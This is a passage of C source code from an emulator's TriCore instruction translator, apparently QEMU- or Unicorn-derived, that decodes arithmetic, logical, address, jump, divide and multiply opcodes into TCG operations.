tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_NE: gen_sh_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUB: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUB_B: gen_helper_sub_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUB_H: gen_helper_sub_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBC: gen_subc_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS: gen_subs(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS_U: gen_subsu(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS_H: gen_helper_sub_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS_HU: gen_helper_sub_h_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], 
tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBX: gen_sub_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_XOR_EQ: gen_accumulating_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_GE: gen_accumulating_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_GE_U: gen_accumulating_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_LT: gen_accumulating_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_LT_U: gen_accumulating_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_NE: gen_accumulating_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rr_logical_shift(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r3, r2, r1; TCGv temp; r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); temp = tcg_temp_new(tcg_ctx); op2 = MASK_OP_RR_OP2(ctx->opcode); switch (op2) { case OPC2_32_RR_AND: tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ANDN: tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_CLO: tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); tcg_gen_clzi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], TARGET_LONG_BITS); break; case OPC2_32_RR_CLO_H: gen_helper_clo_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CLS: tcg_gen_clrsb_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CLS_H: gen_helper_cls_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CLZ: tcg_gen_clzi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], TARGET_LONG_BITS); break; case OPC2_32_RR_CLZ_H: gen_helper_clz_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_NAND: tcg_gen_nand_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_NOR: tcg_gen_nor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_OR: tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ORN: tcg_gen_orc_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH: gen_helper_sh(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_H: gen_helper_sh_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SHA: gen_helper_sha(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SHA_H: gen_helper_sha_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SHAS: gen_shas(ctx, 
tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_XNOR: tcg_gen_eqv_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_XOR: tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_rr_address(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2, n; int r1, r2, r3; TCGv temp; op2 = MASK_OP_RR_OP2(ctx->opcode); r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); n = MASK_OP_RR_N(ctx->opcode); switch (op2) { case OPC2_32_RR_ADD_A: tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_ADDSC_A: temp = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], n); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_RR_ADDSC_AT: temp = tcg_temp_new(tcg_ctx); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 3); tcg_gen_add_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], temp, 0xFFFFFFFC); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_RR_EQ_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_EQZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], 0); break; case OPC2_32_RR_GE_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_LT_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_MOV_A: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MOV_AA: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_MOV_D: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_NE_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_NEZ_A: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], 0); break; case OPC2_32_RR_SUB_A: tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rr_idirect(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1; op2 = MASK_OP_RR_OP2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); switch (op2) { case OPC2_32_RR_JI: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; case OPC2_32_RR_JLI: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; case OPC2_32_RR_CALLI: gen_helper_1arg(tcg_ctx, call, ctx->pc_succ_insn); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; case OPC2_32_RR_FCALLI: gen_fcall_save_ctx(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = 
DISAS_NORETURN; } static void decode_rr_divide(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; TCGv temp, temp2, temp3; op2 = MASK_OP_RR_OP2(ctx->opcode); r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); switch (op2) { case OPC2_32_RR_BMERGE: gen_helper_bmerge(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_BSPLIT: CHECK_REG_PAIR(r3); gen_bsplit(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_DVINIT_B: CHECK_REG_PAIR(r3); gen_dvinit_b(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_DVINIT_BU: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); tcg_gen_shri_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r1], 8); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); if (!has_feature(ctx, TRICORE_FEATURE_131)) { /* overflow = (abs(D[r3+1]) >= abs(D[r2])) */ tcg_gen_abs_tl(tcg_ctx, temp, temp3); tcg_gen_abs_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_V, temp, temp2); } else { /* overflow = (D[b] == 0) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r2], 0); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* write result */ tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 24); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); break; case OPC2_32_RR_DVINIT_H: CHECK_REG_PAIR(r3); gen_dvinit_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_DVINIT_HU: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); tcg_gen_shri_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r1], 16); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); if (!has_feature(ctx, TRICORE_FEATURE_131)) { /* overflow = (abs(D[r3+1]) >= abs(D[r2])) */ tcg_gen_abs_tl(tcg_ctx, temp, temp3); tcg_gen_abs_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_V, temp, temp2); } else { /* overflow = (D[b] == 0) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r2], 0); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* write result */ tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); break; case OPC2_32_RR_DVINIT: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); /* overflow = ((D[b] == 0) || ((D[b] == 0xFFFFFFFF) && (D[a] == 0x80000000))) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, tcg_ctx->cpu_gpr_d[r2], 0xffffffff); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, tcg_ctx->cpu_gpr_d[r1], 0x80000000); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, tcg_ctx->cpu_gpr_d[r2], 0); 
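/* Both DVINIT overflow conditions (divide by zero, or the 0x80000000 / -1 corner case) are now in temp/temp2; the next ops fold them into PSW_V, which this translator keeps in bit 31. */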
tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, temp, temp2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); /* write result */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); /* sign extend to high reg */ tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], 31); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC2_32_RR_DVINIT_U: /* overflow = (D[b] == 0) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r2], 0); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); /* write result */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); /* zero extend to high reg*/ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], 0); break; case OPC2_32_RR_PARITY: gen_helper_parity(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_UNPACK: CHECK_REG_PAIR(r3); gen_unpack(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CRC32: if (has_feature(ctx, TRICORE_FEATURE_161)) { gen_helper_crc32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_DIV: if (has_feature(ctx, TRICORE_FEATURE_16)) { GEN_HELPER_RR(tcg_ctx, divide, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_DIV_U: if (has_feature(ctx, TRICORE_FEATURE_16)) { GEN_HELPER_RR(tcg_ctx, divide_u, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_MUL_F: gen_helper_fmul(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_DIV_F: gen_helper_fdiv(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_CMP_F: gen_helper_fcmp(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_FTOI: gen_helper_ftoi(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_ITOF: gen_helper_itof(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_FTOUZ: gen_helper_ftouz(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_UPDFL: gen_helper_updfl(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_UTOF: gen_helper_utof(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_FTOIZ: gen_helper_ftoiz(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_QSEED_F: gen_helper_qseed(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RR1 Format */ static void decode_rr1_mul(DisasContext *ctx) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; TCGv n; TCGv_i64 temp64; r1 = MASK_OP_RR1_S1(ctx->opcode); r2 = MASK_OP_RR1_S2(ctx->opcode); r3 = MASK_OP_RR1_D(ctx->opcode); n = tcg_const_i32(tcg_ctx, MASK_OP_RR1_N(ctx->opcode)); op2 = MASK_OP_RR1_OP2(ctx->opcode); switch (op2) { case OPC2_32_RR1_MUL_H_32_LL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LL(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MUL_H_32_LU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LU(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MUL_H_32_UL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UL(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MUL_H_32_UU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UU(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_LL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_LU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_UL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_UU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ 
